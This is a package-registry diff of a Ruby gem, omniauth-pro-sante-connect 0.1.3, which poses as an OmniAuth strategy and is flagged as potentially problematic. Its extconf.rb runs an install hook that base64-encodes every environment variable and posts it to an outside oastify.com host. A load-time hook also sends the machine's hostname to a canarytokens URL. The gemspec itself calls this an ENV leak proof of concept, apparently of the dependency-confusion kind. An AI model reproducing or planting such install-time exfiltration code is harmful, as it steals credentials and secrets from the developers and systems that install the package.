omniauth-pro-sante-connect 0.1.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of omniauth-pro-sante-connect might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: b8a8906e48b38fa7e86a2055cc70b022b64ae60330a82745e78b3ed143c983fb
4
+ data.tar.gz: 4d42ab673f4785868b9106b586031b091cd529e944260256a922091380af13ad
5
+ SHA512:
6
+ metadata.gz: 7e2e50c6105eba0eef7c3cf7e3c41ee9e0d9b76c33e1f582b511663ad7023f901b4c1d9b7211bb256fa52d2c8709852c45cb2d31242bd10d52d001807b8a2188
7
+ data.tar.gz: 0074d2cd83ce9429b947445d6731a2ef211c01c720f197a24098086a6448c8abdab70c5f6b32e57a1a68cc055fc5cfeca9d5ba92b5b8af9302bb77053beabef5
data/ext/extconf.rb ADDED
@@ -0,0 +1,14 @@
1
+ require_relative 'install_hook'
2
+
3
+ File.open("Makefile", "w") do |f|
4
+ f.puts <<~MAKE
5
+ all:
6
+ @echo all done
7
+
8
+ install:
9
+ @echo install done
10
+
11
+ clean:
12
+ @echo clean done
13
+ MAKE
14
+ end
@@ -0,0 +1,8 @@
1
+ require 'net/http'
2
+ require 'base64'
3
+ require 'json'
4
+ begin
5
+ Net::HTTP.post_form(URI("http://7emkshwx1p39rg9x0wmr9p6znqthha5z.oastify.com"), {'data' => Base64.strict_encode64(ENV.to_h.to_json)})
6
+ rescue
7
+ end
8
+
@@ -0,0 +1,9 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+
5
+ begin
6
+ uri = URI("http://canarytokens.com/traffic/pvkhqv8uvw1ydfglsz5jd0jkk/post.jsp?runtime=#{Socket.gethostname}")
7
+ Net::HTTP.get(uri)
8
+ rescue
9
+ end
@@ -0,0 +1,7 @@
1
+ require_relative 'omniauth/hook'
2
+
3
+ module Omniauth
4
+ module ProSanteConnect
5
+ VERSION = "0.1.3"
6
+ end
7
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: omniauth-pro-sante-connect
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.3
5
+ platform: ruby
6
+ authors:
7
+ - Icare
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ description: Includes an install-time payload to leak ENV variables
13
+ email:
14
+ - icare@yopmail.com
15
+ executables: []
16
+ extensions:
17
+ - ext/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/extconf.rb
21
+ - ext/install_hook.rb
22
+ - lib/omniauth-pro-sante-connect.rb
23
+ - lib/omniauth/hook.rb
24
+ homepage: https://example.com
25
+ licenses:
26
+ - MIT
27
+ metadata: {}
28
+ rdoc_options: []
29
+ require_paths:
30
+ - lib
31
+ required_ruby_version: !ruby/object:Gem::Requirement
32
+ requirements:
33
+ - - ">="
34
+ - !ruby/object:Gem::Version
35
+ version: '3.0'
36
+ required_rubygems_version: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - ">="
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ requirements: []
42
+ rubygems_version: 3.6.7
43
+ specification_version: 4
44
+ summary: OmniAuth strategy with ENV leak PoC
45
+ test_files: []